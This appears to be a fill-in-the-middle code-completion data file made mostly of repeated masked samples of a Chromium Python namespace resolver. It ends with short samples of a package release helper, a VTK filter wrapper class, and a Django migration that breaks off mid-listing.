from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
<|fim_middle|>
<|fim▁end|> | '''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
<|fim_middle|>
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | basename = UnixName(namespace + '.' + basename) |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
<|fim_middle|>
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | basename = UnixName(namespace) |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
<|fim_middle|>
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace) |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
<|fim_middle|>
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment) |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
<|fim_middle|>
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | if full_name not in default_namespace.types:
return None
return default_namespace |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
<|fim_middle|>
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | return None |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
<|fim_middle|>
return None
<|fim▁end|> | return namespace |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def <|fim_middle|>(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | _GenerateFilenames |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def <|fim_middle|>(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | __init__ |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def <|fim_middle|>(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | ResolveNamespace |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def <|fim_middle|>(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | ResolveType |
<|file_name|>pip3.py<|end_file_name|><|fim▁begin|>import subprocess
<|fim▁hole|>
subprocess.call(["python3", "setup.py", "sdist", "upload"])<|fim▁end|> | def release(): |
<|file_name|>pip3.py<|end_file_name|><|fim▁begin|>import subprocess
def release():
<|fim_middle|>
<|fim▁end|> | subprocess.call(["python3", "setup.py", "sdist", "upload"]) |
<|file_name|>pip3.py<|end_file_name|><|fim▁begin|>import subprocess
def <|fim_middle|>():
subprocess.call(["python3", "setup.py", "sdist", "upload"])
<|fim▁end|> | release |
<|file_name|>vtkRuledSurfaceFilter.py<|end_file_name|><|fim▁begin|># class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase<|fim▁hole|> def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkRuledSurfaceFilter(), 'Processing.',
('vtkPolyData',), ('vtkPolyData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)<|fim▁end|> | import vtk
class vtkRuledSurfaceFilter(SimpleVTKClassModuleBase): |
<|file_name|>vtkRuledSurfaceFilter.py<|end_file_name|><|fim▁begin|># class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkRuledSurfaceFilter(SimpleVTKClassModuleBase):
<|fim_middle|>
<|fim▁end|> | def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkRuledSurfaceFilter(), 'Processing.',
('vtkPolyData',), ('vtkPolyData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None) |
<|file_name|>vtkRuledSurfaceFilter.py<|end_file_name|><|fim▁begin|># class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkRuledSurfaceFilter(SimpleVTKClassModuleBase):
def __init__(self, module_manager):
<|fim_middle|>
<|fim▁end|> | SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkRuledSurfaceFilter(), 'Processing.',
('vtkPolyData',), ('vtkPolyData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None) |
<|file_name|>vtkRuledSurfaceFilter.py<|end_file_name|><|fim▁begin|># class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkRuledSurfaceFilter(SimpleVTKClassModuleBase):
def <|fim_middle|>(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkRuledSurfaceFilter(), 'Processing.',
('vtkPolyData',), ('vtkPolyData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
<|fim▁end|> | __init__ |
<|file_name|>0002_auto_20180826_0054.py<|end_file_name|><|fim▁begin|><|fim▁hole|>
class Migration(migrations.Migration):
dependencies = [
('model_filefields_example', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='book',
name='cover',
field=models.ImageField(blank=True, null=True, upload_to='model_filefields_example.BookCover/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='book',
name='index',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookIndex/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='book',
name='pages',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookPages/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='sounddevice',
name='instruction_manual',
